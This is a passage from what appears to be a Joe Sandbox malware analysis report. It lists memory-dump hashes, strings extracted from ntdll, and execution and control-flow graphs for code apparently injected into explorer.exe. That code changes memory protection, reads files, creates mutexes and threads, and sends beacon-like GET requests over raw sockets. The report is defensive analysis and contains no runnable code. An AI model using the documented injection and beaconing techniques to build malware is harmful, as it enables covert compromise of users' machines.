                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e1bcc94d5e0ffd9d418342c7097cad98ec75a35244f9659618a7f328716c6882
                  • Instruction ID: 93df3e17e7a7a9df601f46d56bd0fda0261f9e4811a5af0ca1be0190ce9e20ab
                  • Opcode Fuzzy Hash: e1bcc94d5e0ffd9d418342c7097cad98ec75a35244f9659618a7f328716c6882
                  • Instruction Fuzzy Hash: 8590023124150402D14171584444656001957E0241FD5C023A0524514E86558B5ABA61
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                  • Instruction ID: 89bcb3cab2fa10d703e9dde0e1d519c6d42b564c768eff7d21a9bd89f00f7e6d
                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                  • Instruction Fuzzy Hash:
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID: ___swprintf_l
                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                  • API String ID: 48624451-2108815105
                  • Opcode ID: f7cec3f70f8f5abfd1a879fea677008034af306e005bbf8792e3ad34a0befc2c
                  • Instruction ID: ac2cfd39c65e48fcdca29d2c81001f62bd13dd56fb7afe1972ea96aa7bcf3ff7
                  • Opcode Fuzzy Hash: f7cec3f70f8f5abfd1a879fea677008034af306e005bbf8792e3ad34a0befc2c
                  • Instruction Fuzzy Hash: 3251EAB6B00356BFDB10DB588D90A7EFBB8BB59205710C26AE864D7641D274DE44CBA0
                  Strings
                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 224946FC
                  • Execute=1, xrefs: 22494713
                  • ExecuteOptions, xrefs: 224946A0
                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 22494787
                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 22494725
                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 22494742
                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 22494655
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                  • API String ID: 0-484625025
                  • Opcode ID: 7344695be21a4e97476e2c56f1c710082dae69008c6ac63dbe176699f935799c
                  • Instruction ID: bf3930487eaf16976a648a64272d114d40de991f3a54eef7f127b5c02521a7ef
                  • Opcode Fuzzy Hash: 7344695be21a4e97476e2c56f1c710082dae69008c6ac63dbe176699f935799c
                  • Instruction Fuzzy Hash: 13512A31600319BADB209BA4ED95FEE77F8AF24B14F4001B9D604AB291DB71AE91CF51
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID: __aulldvrm
                  • String ID: +$-$0$0
                  • API String ID: 1302938615-699404926
                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                  • Instruction ID: 827db5654686f3657227c235a771b42b63f0c902a706388f0c190ea2444fcd9d
                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                  • Instruction Fuzzy Hash: A681EF70E057498EDF04CF68CA91BFEBBB2AF45B64F14821AD960B7391C7349981CB61
                  Strings
                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 224902BD
                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 224902E7
                  • RTL: Re-Waiting, xrefs: 2249031E
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                  • API String ID: 0-2474120054
                  • Opcode ID: 38edf7931a9836c846b1155dc0ead3767eef477716416756d6a7f0a8fa75dca7
                  • Instruction ID: 4cf6701989cd55f5fa3eb637166152d5ad6ae4ba44c35fce61d0387fdf8046ac
                  • Opcode Fuzzy Hash: 38edf7931a9836c846b1155dc0ead3767eef477716416756d6a7f0a8fa75dca7
                  • Instruction Fuzzy Hash: DCE18C31A087419FE711CF28C980B1ABBE0AF84718F114B6DE5A58B3E1DB75E985CB52
                  Strings
                  • RTL: Re-Waiting, xrefs: 22497BAC
                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 22497B7F
                  • RTL: Resource at %p, xrefs: 22497B8E
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                  • API String ID: 0-871070163
                  • Opcode ID: 95d66463e80f2162618e53906a71c50d60cdc94825893448a27ad802701a70ea
                  • Instruction ID: e0fafc545e129413637e49bac9439a3fc17e52473cc9354d04e779ddb70b994f
                  • Opcode Fuzzy Hash: 95d66463e80f2162618e53906a71c50d60cdc94825893448a27ad802701a70ea
                  • Instruction Fuzzy Hash: 2141F1727007029FD710CE25C940FAAB7E5EFA8714F100A2DE99ADB780DB31E955CB91
                  APIs
                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 2249728C
                  Strings
                  • RTL: Re-Waiting, xrefs: 224972C1
                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 22497294
                  • RTL: Resource at %p, xrefs: 224972A3
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                  • API String ID: 885266447-605551621
                  • Opcode ID: 2cf6c7e21901b47e637e4c4da063a158781d73b880a33b789b2b7d50c30ba52d
                  • Instruction ID: 41e5c35a2a6c1a5abb845ca17fe11d0f58e826e78ee3fc5d02b0a303c53d0bc3
                  • Opcode Fuzzy Hash: 2cf6c7e21901b47e637e4c4da063a158781d73b880a33b789b2b7d50c30ba52d
                  • Instruction Fuzzy Hash: 1841E0B2700746ABD710CE25CD81FA6BBA5FFA5714F100A19F994AB380DB31E856CBD1
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID: __aulldvrm
                  • String ID: +$-
                  • API String ID: 1302938615-2137968064
                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                  • Instruction ID: a01511efbd0d0ade45c607dfaada38e31b71e617096926076a207d02fd44898c
                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                  • Instruction Fuzzy Hash: 3F9191B0E003169EDB18CFA9C980EFEB7A5EF44724F50461AE955AB3C1E7348981CB50
                  Strings
                  Memory Dump Source
                  • Source File: 00000014.00000002.2009727085.00000000223F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 223F0000, based on PE: true
                  • Associated: 00000014.00000002.2009727085.0000000022519000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002251D000.00000040.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000014.00000002.2009727085.000000002258E000.00000040.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_20_2_223f0000_wab.jbxd
                  Similarity
                  • API ID:
                  • String ID: $$@
                  • API String ID: 0-1194432280
                  • Opcode ID: 7439efe11b81507fcb58979f51d6438037c483144639eaf4feee36f33a35019f
                  • Instruction ID: 86ed2bc4110f021e8d4d545825a2017c293670c1f7f95bb4f760c9bf1fbaa87c
                  • Opcode Fuzzy Hash: 7439efe11b81507fcb58979f51d6438037c483144639eaf4feee36f33a35019f
                  • Instruction Fuzzy Hash: 1E811871D003699BDB32CB55CD44BEAB7B4AF08754F1042EAEA19B7240D7709E85CFA1

                  Execution Graph

                  Execution Coverage:1.6%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:11.1%
                  Total number of Nodes:81
                  Total number of Limit Nodes:9
                  execution_graph 20189 b30e8c2 20191 b30e934 20189->20191 20190 b30e9a6 20191->20190 20192 b30e995 ObtainUserAgentString 20191->20192 20192->20190 20193 b313232 20194 b31325c 20193->20194 20198 b313334 20193->20198 20195 b313410 NtCreateFile 20194->20195 20194->20198 20196 b31345d 20195->20196 20197 b3135e9 NtReadFile 20196->20197 20196->20198 20197->20198 20199 b314e12 20203 b313942 20199->20203 20201 b314e45 NtProtectVirtualMemory 20202 b314e70 20201->20202 20204 b313967 20203->20204 20204->20201 20205 b313f82 20206 b313fb8 20205->20206 20209 b314081 20206->20209 20216 b314022 20206->20216 20217 b3105b2 20206->20217 20208 b314134 20214 b3141b2 20208->20214 20208->20216 20220 b310732 20208->20220 20209->20208 20211 b314117 getaddrinfo 20209->20211 20209->20216 20211->20208 20213 b3147f4 setsockopt recv 20213->20216 20214->20216 20223 b3106b2 20214->20223 20215 b314729 20215->20213 20215->20216 20218 b31060a socket 20217->20218 20219 b3105ec 20217->20219 20218->20209 20219->20218 20221 b310788 connect 20220->20221 20222 b31076a 20220->20222 20221->20214 20222->20221 20224 b310705 send 20223->20224 20225 b3106e7 20223->20225 20224->20215 20225->20224 20226 b314bac 20227 b314bb1 20226->20227 20260 b314bb6 20227->20260 20261 b30ab72 20227->20261 20229 b314c2c 20230 b314c85 20229->20230 20232 b314c54 20229->20232 20233 b314c69 20229->20233 20229->20260 20275 b312ab2 NtProtectVirtualMemory 20230->20275 20271 b312ab2 NtProtectVirtualMemory 20232->20271 20236 b314c80 20233->20236 20237 b314c6e 20233->20237 20234 b314c8d 20276 b30c102 ObtainUserAgentString NtProtectVirtualMemory 20234->20276 20236->20230 20238 b314c97 20236->20238 20273 b312ab2 NtProtectVirtualMemory 20237->20273 20242 b314c9c 20238->20242 20243 b314cbe 20238->20243 20240 b314c5c 20272 b30bee2 ObtainUserAgentString NtProtectVirtualMemory 20240->20272 20265 b312ab2 NtProtectVirtualMemory 20242->20265 20247 b314cc7 20243->20247 20248 b314cd9 20243->20248 20243->20260 20245 b314c76 20274 b30bfc2 ObtainUserAgentString NtProtectVirtualMemory 20245->20274 20277 b312ab2 NtProtectVirtualMemory 20247->20277 20248->20260 20279 b312ab2 NtProtectVirtualMemory 20248->20279 20251 b314ccf 20278 b30c2f2 ObtainUserAgentString NtProtectVirtualMemory 20251->20278 20253 b314cac 20266 b30bde2 ObtainUserAgentString 20253->20266 20255 b314ce5 20280 b30c712 ObtainUserAgentString NtProtectVirtualMemory 20255->20280 20258 b314cb4 20267 b308412 20258->20267 20263 b30ab93 20261->20263 20262 b30acce 20262->20229 20263->20262 20264 b30acb5 CreateMutexW 20263->20264 20264->20262 20265->20253 20266->20258 20269 b308440 20267->20269 20268 b308473 20268->20260 20269->20268 20270 b30844d CreateThread 20269->20270 20270->20260 20271->20240 20272->20260 20273->20245 20274->20260 20275->20234 20276->20260 20277->20251 20278->20260 20279->20255 20280->20260 20281 b3082dd 20284 b30831a 20281->20284 20282 b3083fa 20283 b308328 SleepEx 20283->20283 20283->20284 20284->20282 20284->20283 20288 b312f12 8 API calls 20284->20288 20289 b309432 NtCreateFile NtReadFile 20284->20289 20290 b3080f2 6 API calls 20284->20290 20288->20284 20289->20284 20290->20284

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 0 b313f82-b313fb6 1 b313fd6-b313fd9 0->1 2 b313fb8-b313fbc 0->2 4 b313fdf-b313fed 1->4 5 b3148fe-b31490c 1->5 2->1 3 b313fbe-b313fc2 2->3 3->1 6 b313fc4-b313fc8 3->6 7 b313ff3-b313ff7 4->7 8 b3148f6-b3148f7 4->8 6->1 9 b313fca-b313fce 6->9 10 b313ff9-b313ffd 7->10 11 b313fff-b314000 7->11 8->5 9->1 12 b313fd0-b313fd4 9->12 10->11 13 b31400a-b314010 10->13 11->13 12->1 12->4 14 b314012-b314020 13->14 15 b31403a-b314060 13->15 14->15 18 b314022-b314026 14->18 16 b314062-b314066 15->16 17 b314068-b31407c call b3105b2 15->17 16->17 19 b3140a8-b3140ab 16->19 24 b314081-b3140a2 17->24 18->8 21 b31402c-b314035 18->21 22 b3140b1-b3140b8 19->22 23 b314144-b314150 19->23 21->8 25 b3140e2-b3140f5 22->25 26 b3140ba-b3140dc call b313942 22->26 27 b314156-b314165 23->27 28 b3148ee-b3148ef 23->28 24->19 24->28 25->28 30 b3140fb-b314101 25->30 26->25 31 b314167-b314178 call b310552 27->31 32 b31417f-b31418f 27->32 28->8 30->28 36 b314107-b314109 30->36 31->32 33 b314191-b3141ad call b310732 32->33 34 b3141e5-b31421b 32->34 43 b3141b2-b3141da 33->43 39 b31422d-b314231 34->39 40 b31421d-b31422b 34->40 36->28 41 b31410f-b314111 36->41 45 b314233-b314245 39->45 46 b314247-b31424b 39->46 44 b31427f-b314280 40->44 41->28 47 b314117-b314132 getaddrinfo 41->47 43->34 48 b3141dc-b3141e1 43->48 52 b314283-b3142e0 call b314d62 call b311482 call b310e72 call b315002 44->52 45->44 49 b314261-b314265 46->49 50 b31424d-b31425f 46->50 47->23 51 b314134-b31413c 47->51 48->34 53 b314267-b31426b 49->53 54 b31426d-b314279 49->54 50->44 51->23 63 b3142e2-b3142e6 52->63 64 b3142f4-b314354 call b314d92 52->64 53->52 53->54 54->44 63->64 65 b3142e8-b3142ef call b311042 63->65 69 b31435a-b314396 call b314d62 call b315262 call b315002 64->69 70 b31448c-b3144b8 call b314d62 call b315262 64->70 65->64 85 b314398-b3143b7 call b315262 call b315002 69->85 86 b3143bb-b3143e9 call b315262 * 2 69->86 79 b3144d9-b314590 call b315262 * 3 call b315002 * 2 call b311482 70->79 80 b3144ba-b3144d5 70->80 110 b314595-b3145b9 call b315262 79->110 80->79 85->86 101 b314415-b31441d 86->101 102 b3143eb-b314410 call b315002 call b315262 86->102 103 b314442-b314448 101->103 104 b31441f-b314425 101->104 102->101 103->110 111 b31444e-b314456 103->111 108 b314467-b314487 call b315262 104->108 109 b314427-b31443d 104->109 108->110 109->110 120 b3145d1-b3146ad call b315262 * 7 call b315002 call b314d62 call b315002 call b310e72 call b311042 110->120 121 b3145bb-b3145cc call b315262 call b315002 110->121 111->110 115 b31445c-b31445d 111->115 115->108 132 b3146af-b3146b3 120->132 121->132 134 b3146b5-b3146fa call b310382 call b3107b2 132->134 135 b3146ff-b31472d call b3106b2 132->135 155 b3148e6-b3148e7 134->155 145 b31475d-b314761 135->145 146 b31472f-b314735 135->146 147 b314767-b31476b 145->147 148 b31490d-b314913 145->148 146->145 151 b314737-b31474c 146->151 152 b314771-b314773 147->152 153 b3148aa-b3148df call b3107b2 147->153 157 b314779-b314784 148->157 158 b314919-b314920 148->158 151->145 156 b31474e-b314754 151->156 152->153 152->157 153->155 155->28 156->145 163 b314756 156->163 159 b314795-b314796 157->159 160 b314786-b314793 157->160 158->160 164 b31479c-b3147a0 159->164 160->159 160->164 163->145 167 b3147b1-b3147b2 164->167 168 b3147a2-b3147af 164->168 170 b3147b8-b3147c4 167->170 168->167 168->170 173 b3147f4-b314861 setsockopt recv 170->173 174 b3147c6-b3147ef call b314d92 call b314d62 170->174 177 b3148a3-b3148a4 173->177 178 b314863 173->178 174->173 177->153 178->177 179 b314865-b31486a 178->179 179->177 182 b31486c-b314872 179->182 182->177 185 b314874-b3148a1 182->185 185->177 185->178
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.2539715422.000000000B230000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B230000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_b230000_explorer.jbxd
                  Similarity
                  • API ID: getaddrinforecvsetsockopt
                  • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                  • API String ID: 1564272048-1117930895
                  • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                  • Instruction ID: 16afc04ee5bf60e2be10a5fd3323c7566e33e4379bba3064cc95691514bd13b9
                  • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                  • Instruction Fuzzy Hash: 67528031614A088FCB2DEF68C4957E9B7E5FB94300F64492EC4AFD7246DE70A546CB81

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 289 b313232-b313256 290 b3138bd-b3138cd 289->290 291 b31325c-b313260 289->291 291->290 292 b313266-b3132a0 291->292 293 b3132a2-b3132a6 292->293 294 b3132bf 292->294 293->294 295 b3132a8-b3132ac 293->295 296 b3132c6 294->296 297 b3132b4-b3132b8 295->297 298 b3132ae-b3132b2 295->298 299 b3132cb-b3132cf 296->299 297->299 302 b3132ba-b3132bd 297->302 298->296 300 b3132d1-b3132f7 call b313942 299->300 301 b3132f9-b31330b 299->301 300->301 306 b313378 300->306 301->306 307 b31330d-b313332 301->307 302->299 310 b31337a-b3133a0 306->310 308 b3133a1-b3133a8 307->308 309 b313334-b31333b 307->309 311 b3133d5-b3133dc 308->311 312 b3133aa-b3133d3 call b313942 308->312 313 b313366-b313370 309->313 314 b31333d-b313360 call b313942 309->314 316 b313410-b31345f NtCreateFile call b313172 311->316 317 b3133de-b31340a call b313942 311->317 312->306 312->311 313->306 319 b313372-b313373 313->319 314->313 316->306 326 b313465-b31346d 316->326 317->306 317->316 319->306 326->306 327 b313473-b313476 326->327 328 b313486-b31348d 327->328 329 b313478-b313481 327->329 330 b3134c2-b3134ec 328->330 331 b31348f-b3134b8 call b313942 328->331 329->310 337 b3134f2-b3134f5 330->337 338 b3138ae-b3138b8 330->338 331->306 336 b3134be-b3134bf 331->336 336->330 339 b313604-b313611 337->339 340 b3134fb-b3134fe 337->340 338->306 339->310 341 b313500-b313507 340->341 342 b31355e-b313561 340->342 347 b313509-b313532 call b313942 341->347 348 b313538-b313559 341->348 344 b313567-b313572 342->344 345 b313616-b313619 342->345 349 b3135a3-b3135a6 344->349 350 b313574-b31359d call b313942 344->350 351 b3136b8-b3136bb 345->351 352 b31361f-b313626 345->352 347->306 347->348 354 b3135e9-b3135fe NtReadFile 348->354 349->306 356 b3135ac-b3135b6 349->356 350->306 350->349 357 b313739-b31373c 351->357 358 b3136bd-b3136c4 351->358 359 b313657-b31366b call b314e92 352->359 360 b313628-b313651 call b313942 352->360 354->339 356->306 366 b3135bc-b3135e6 356->366 362 b313742-b313749 357->362 363 b3137c4-b3137c7 357->363 367 b3136f5-b313734 358->367 368 b3136c6-b3136ef call b313942 358->368 359->306 377 b313671-b3136b3 359->377 360->306 360->359 370 b31374b-b313774 call b313942 362->370 371 b31377a-b3137bf 362->371 363->306 373 b3137cd-b3137d4 363->373 366->354 382 b313894-b3138a9 367->382 368->338 368->367 370->338 370->371 371->382 378 b3137d6-b3137f6 call b313942 373->378 379 b3137fc-b313803 373->379 377->310 378->379 386 b313805-b313825 call b313942 379->386 387 b31382b-b313835 379->387 382->310 386->387 387->338 388 b313837-b31383e 387->388 388->338 393 b313840-b313886 388->393 393->382
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.2539715422.000000000B230000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B230000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_b230000_explorer.jbxd
                  Similarity
                  • API ID: File$CreateRead
                  • String ID: `
                  • API String ID: 3388366904-2679148245
                  • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                  • Instruction ID: fb6627fcee63f6ca7fe91fa242ff69b296bd915d8ffef5733b682f23fa11500c
                  • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                  • Instruction Fuzzy Hash: 5D224A70A18A09AFCB5DDF28C4997AAF7E5FB98301F500A2ED45ED7250DF30A451CB89

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 443 b314e12-b314e6e call b313942 NtProtectVirtualMemory 446 b314e70-b314e7c 443->446 447 b314e7d-b314e8f 443->447
                  APIs
                  • NtProtectVirtualMemory.NTDLL ref: 0B314E67
                  Memory Dump Source
                  • Source File: 00000016.00000002.2539715422.000000000B230000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B230000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_b230000_explorer.jbxd
                  Similarity
                  • API ID: MemoryProtectVirtual
                  • String ID:
                  • API String ID: 2706961497-0
                  • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                  • Instruction ID: b5db207ed74f9e8e4ec1701f524755f167564e1c0c6af12ffb606633c81214f2
                  • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                  • Instruction Fuzzy Hash: 0801B130628B484F8B88EF6CD48122AB7E4FBCD315F000B3EE99AC3250EB70C5414B82

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 448 b314e0a-b314e38 449 b314e45-b314e6e NtProtectVirtualMemory 448->449 450 b314e40 call b313942 448->450 451 b314e70-b314e7c 449->451 452 b314e7d-b314e8f 449->452 450->449
                  APIs
                  • NtProtectVirtualMemory.NTDLL ref: 0B314E67
                  Memory Dump Source
                  • Source File: 00000016.00000002.2539715422.000000000B230000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B230000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_b230000_explorer.jbxd
                  Similarity
                  • API ID: MemoryProtectVirtual
                  • String ID:
                  • API String ID: 2706961497-0
                  • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                  • Instruction ID: 74dd6fef9a8ea358a7d9e077af85fd7ba25f9aad1c50e3e92426e3077af93b1c
                  • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                  • Instruction Fuzzy Hash: C601A234628B884F8B48EF2C94412A6B3E5FBCE314F000B7EE9DAC3240DB21D5024B82

                  Control-flow Graph

                  APIs
                  • ObtainUserAgentString.URLMON ref: 0B30E9A0
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.2539715422.000000000B230000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B230000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_b230000_explorer.jbxd
                  Similarity
                  • API ID: AgentObtainStringUser
                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                  • API String ID: 2681117516-319646191
                  • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                  • Instruction ID: 39bcb3f6f58ccca51cda23bdf0c6c1d504cd2c9b32100a02ba40cb21f2860b3a
                  • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                  • Instruction Fuzzy Hash: 8C31D131A14A0D8FCF44EFA8C8857EDB7E4FF98204F50062AD44ED7240DE788645C789

                  Control-flow Graph

                  APIs
                  • ObtainUserAgentString.URLMON ref: 0B30E9A0
                  Strings
                  Memory Dump Source
                  • Source File: 00000016.00000002.2539715422.000000000B230000.00000040.80000000.00040000.00000000.sdmp, Offset: 0B230000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_22_2_b230000_explorer.jbxd
                  Similarity
                  • API ID: AgentObtainStringUser
                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                  • API String ID: 2681117516-319646191
                  • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                  • Instruction ID: bbe4ff6c617676b3a827aca8b89c85429e9edb9c0bb061cf7bf49d45f44b5736
                  • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                  • Instruction Fuzzy Hash: 8221E671A10A1D8FCF44EFA8C8957ED7BE5FF98204F50461AD45AD7240DF748605CB89

                  Control-flow Graph

                  • Executed
                  • Not Executed
